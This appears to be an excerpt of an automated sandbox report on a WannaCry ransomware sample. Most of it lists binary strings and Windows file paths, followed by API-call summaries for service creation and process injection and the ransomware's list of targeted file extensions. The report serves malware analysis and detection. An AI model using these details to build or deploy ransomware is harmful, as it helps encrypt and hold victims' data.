              Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\cdrom.inf_loc
              Source: mssecsvc.exe.2.drBinary string: 8\Device\HarddiskVolume2\Windows\System32\drivers\smb.sysH
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\schedlog.cfgp
              Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Windows\System32\MSMPEG2ENC.DLLp
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\adpahci.sysp
              Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Program Files\AVG\Av\avg_us.lngp
              Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\ndisuio.PNFT`
              Source: mssecsvc.exe.2.drBinary string: j\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avgidpagent.log.1
              Source: mssecsvc.exe.2.drBinary string: q\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Contentp
              Source: mssecsvc.exe.2.drBinary string: m\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep003.cat
              Source: mssecsvc.exe.2.drBinary string: x\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.001H
              Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Program Files\AVG\Av\avg_ru.lng>"
              Source: mssecsvc.exe.2.drBinary string: .\Device\HarddiskVolume2\Windows\inf\wfplwf.PNF
              Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\Performance\WinSAT
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WinOcr-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\nfrd960.sys
              Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\cdrom.inf_locp
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\bthmodem.sys
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\fdPHost.dll
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Program Files\AVG\UiDll\2623
              Source: mssecsvc.exe.2.drBinary string: z\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.236.gthr
              Source: mssecsvc.exe.2.drBinary string: x\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.002H
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\ws2ifsl.sys
              Source: mssecsvc.exe.2.drBinary string: k\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx00w.cat
              Source: mssecsvc.exe.2.drBinary string: p\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost8P
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\megasas.sysPD
              Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\blbdrive.inf_loc
              Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\blbdrive.inf_locH
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc00c.cat
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\vsmraid.sysp
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\rasmans.dll
              Source: mssecsvc.exe.2.drBinary string: r\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs1
              Source: mssecsvc.exe.2.drBinary string: X\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Windows Error ReportingPU
              Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\Temp\avg_a04392p
              Source: mssecsvc.exe.2.drBinary string: c\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibilityum
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NFS-ClientSKU-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep00b.cat
              Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\msdtc.exe}SDTL
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\mrxdav.sys
              Source: mssecsvc.exe.2.drBinary string: a\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\ntexe.catp
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\aelupsvc.dll
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx00d.cat
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010001.ciT
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RasCMAK-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2534111~31bf3856ad364e35~x86~~6.1.1.0.cat
              Source: mssecsvc.exe.2.drBinary string: L\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\tssecsrv.sys
              Source: mssecsvc.exe.2.drBinary string: A\Device\HarddiskVolume2\Windows\System32\Speech\SpeechUX\sapi.cpl
              Source: mssecsvc.exe.2.drBinary string: L\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Roaming\/
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\vms3cap.sysST
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\wacompen.sysp
              Source: mssecsvc.exe.2.drBinary string: f\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\History68E:
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\tdtcp.sys
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\msdtckrm.dll
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\amdsata.sys
              Source: mssecsvc.exe.2.drBinary string: x\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000H
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Users\Public\Documents\desktop.ini
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catp
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\HpSAMD.sys F
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\bxvbdx.sys
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WinOcr-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnts003.cat
              Source: mssecsvc.exe.2.drBinary string: r\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\CTLsp
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\auditcse.dll
              Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\scfilter.sys.mui
              Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\tbssvc.dllSTE
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx002.catp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\usb.inf_locp
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\NV_AGP.SYSH
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catH
              Source: mssecsvc.exe.2.drBinary string: `\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\ntph.cat
              Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\lltdio.inf_locp
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\DriverStore\en-USC
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.inip
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\advpack.dll
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\ncobjapi.dllp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-Sensors-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catp
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\history.xml
              Source: mssecsvc.exe.2.drBinary string: A\Device\HarddiskVolume2\ProgramData\Avg\AV\Chjw\avgpsi.db-journal
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\msdsm.sysh
              Source: mssecsvc.exe.2.drBinary string: 6\Device\HarddiskVolume2\Windows\System32\sqlceqp30.dll
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr00a.cat
              Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\netserv.PNFTMP8p
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-HomeBasicEdition-wrapper~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\volsnap.PNFR07
              Source: mssecsvc.exe.2.drBinary string: `\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows~p
              Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\volmgrx.sys.muip
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Server-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\HdAudio.sysr
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976932~31bf3856ad364e35~x86~~6.1.0.17514.catlum
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\WUClient-SelfUpdate-Aux-AuxComp~31bf3856ad364e35~x86~ru-RU~7.6.7600.320.cat
              Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netsstpt.inf_loc
              Source: mssecsvc.exe.2.drBinary string: E\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\AMDAGP.SYS.mui
              Source: mssecsvc.exe.2.drBinary string: X\Device\HarddiskVolume2\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}t$p
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc005.catp
              Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\GAGP30KX.SYS.mui@p
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\VMBusHID.sys
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00d.cat
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep002.catp
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00c.catGQ
              Source: mssecsvc.exe.2.drBinary string: h\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Cookies
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\evbdx.sysskV
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\asyncmac.sys
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\iaStorV.sysr*
              Source: mssecsvc.exe.2.drBinary string: g\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\AVG\AV\cfgall\fixcfg.lockc
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Encoder-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: c\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avgemc.log
              Source: mssecsvc.exe.2.drBinary string: O\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe5E
              Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\System32\ruIE
              Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\wbem\Logs856p
              Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\System32\drivers\mshidkmdf.sysA
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\mrxdav.sysD
              Source: mssecsvc.exe.2.drBinary string: q\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\BrSerWdm.sys
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-UltimateEdition~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\HdAudio.sysd
              Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\servicing\TrustedInstaller.exeAP7PDC
              Source: mssecsvc.exe.2.drBinary string: k\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB976902~31bf3856ad364e35~x86~~6.1.1.17514.catCp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WindowsFoundation-LanguagePack-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catid4
              Source: mssecsvc.exe.2.drBinary string: h\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avgidpdrv.log.2H
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Media-Format-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: 1\Device\HarddiskVolume2\Windows\System32\pots.dllp
              Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: \\Device\HarddiskVolume2\Windows\System32\ru-RU\microsoft-windows-kernel-power-events.dll.mui
              Source: mssecsvc.exe.2.drBinary string: t\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.inim
              Source: mssecsvc.exe.2.drBinary string: k\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exeta
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-WMIProvider-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat$0p
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\dot3svc.dllPN
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\rdpdr.sysw
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\pnrpauto.dll
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\winusb.sysiv
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\gpscript.dll
              Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\config\systemprofile\Favorites3
              Source: mssecsvc.exe.2.drBinary string: 1\Device\HarddiskVolume2\Windows\System32\qmgr.dll
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976932~31bf3856ad364e35~x86~~6.1.0.17514.cat
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnky007.catp
              Source: mssecsvc.exe.2.drBinary string: @\Device\HarddiskVolume2\Windows\Prefetch\SVCHOST.EXE-007FEA55.pf
              Source: mssecsvc.exe.2.drBinary string: S\Device\HarddiskVolume2\Program Files\Common Files\AV\avast! Antivirus\userdata.cab0_TS
              Source: mssecsvc.exe.2.drBinary string: A\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00y.catp
              Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc
              Source: mssecsvc.exe.2.drBinary string: |\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.iniop
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\lpremove.exep
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\hidbth.sys<\
              Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\System32\gatherNetworkInfo.vbs1
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Server-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat\
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\djsvs.sysD
              Source: mssecsvc.exe.2.drBinary string: O\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Local\Temp
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\vmbus.sys
              Source: mssecsvc.exe.2.drBinary string: S\Device\HarddiskVolume3\$RECYCLE.BIN\S-1-5-21-1870734524-1274666089-2119431859-1000H
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnhp002.catWp
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr004.catH
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\vms3cap.sys
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\ru-RU\rascfg.dll.mui
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Tuner-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: classification engine | Classification label: mal100.rans.troj.evad.winDLL@29/11@24/3
              Source: C:\Windows\mssecsvc.exe | Code function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00407C40
              Source: C:\Windows\mssecsvc.exe | Code function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,8_2_00407C40
              Source: C:\Windows\tasksche.exe | Code function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,31_2_00401CE8
              Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,4_2_00408090
              Source: C:\Windows\mssecsvc.exe | Code function: 8_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,8_2_00408090
              Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00407C40
              Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00AC05F2 FindCloseChangeNotification,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,FindCloseChangeNotification,4_2_00AC05F2
              Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2jb4FtSNq.dll,PlayGame
              Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,CloseHandle,CreateProcessA,CloseHandle,CloseHandle,4_2_00407CE0
              Source: mssecsvc.exe, 00000004.00000000.263399045.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000008.00000000.265918603.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000C.00000000.275826042.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp, y2jb4FtSNq.dll, tasksche.exe.8.dr, mssecsvc.exe.2.dr | Binary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
              Source: mssecsvc.exe | String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition-wrapper~3
              Source: mssecsvc.exe | String found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04392\avg-secure-search-installer.exe
